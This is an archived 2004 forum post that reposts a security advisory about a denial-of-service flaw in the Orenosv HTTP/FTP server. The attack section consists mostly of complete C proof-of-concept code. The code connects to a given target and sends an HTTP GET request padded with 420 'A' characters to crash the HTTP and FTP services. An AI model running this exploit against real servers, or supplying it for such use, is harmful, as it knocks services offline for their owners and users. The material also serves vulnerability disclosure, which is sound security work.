Orenosv Http/ftp Server Dos

Full Version: Orenosv Http/ftp Server Dos

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

May 26 2004, 04:33 AM

QUOTE

Orenosv is an HTTP/FTP/FTPS server running on Windows NT 4.0, Windows 2000 and Windows XP platforms. Orenosv is a freely distributable software.

A specially crafted HTTP GET request which contains 420 A's will cause the HTTP and FTP service to stop responding.

SP Research Labs Advisory x13
-----------------------------

Orenosv HTTP/FTP Server Denial Of Service
-----------------------------------------

Versions:
orenosv059f

Vendor:
http://hp.vector.co.jp/authors/VA027031/or...v/index_en.html

Date Released - 5.25.2004

------------------------------------
Product Description from the vendor:

Orenosv is an HTTP/FTP/FTPS server running on Windows NT 4.0, Windows 2000 and Windows XP platforms.
Orenosv is a freely distributable software.

--------
Details:

A specifically crafted HTTP GET request which contains 420 A's will cause the HTTP and FTP service
to stop responding.

--------
Exploit:

Below is very basic PoC code which only causes the orenosv service to crash.

/* Orenosv HTTP/FTP Server Denial Of Service

Version:
orenosv059f

Vendor:
http://hp.vector.co.jp/authors/VA027031/or...v/index_en.html

Coded and Discovered by:
badpack3t <badpack3t@security-protocols.com>
.:sp research labs:.
www.security-protocols.com
5.25.2004
*/

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char exploit[] =

/* 420 A's - looks ugly but owell */
"GET / AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA"
& quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA"
& quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA"
& quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.0\r\n\r\n";

int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET mysocket;

if (argc < 2)
{
printf("Orenosv HTTP/FTP Server DoS by badpack3t\r\n\r\n", argv[0]);
printf("Usage:\r\n %s <targetip> [targetport] (default is 9999)\r\n\r\n", argv[0]);
printf("www.security-protocols.com\r\n\r\n", argv[0]);
exit(1);
}

wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

target = argv[1];
port = 9999;

if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);

mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET)
{
printf("Socket error!\r\n");
exit(1);
}

printf("Resolving Hostnames...\n");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("Resolve of %s failed\n", argv[1]);
exit(1);
}

memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);

printf("Connecting...\n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host.\n");
exit(1);
}

printf("Connected!...\n");
printf("Sending Payload...\n");
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
{
printf("Error Sending the Exploit Payload\r\n");
closesocket(mysocket);
exit(1);
}

printf("Payload has been sent! Check if the webserver is dead.\r\n");
closesocket(mysocket);
WSACleanup();
return 0;
}

--------------
Tested on:
WindowsXP SP1

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.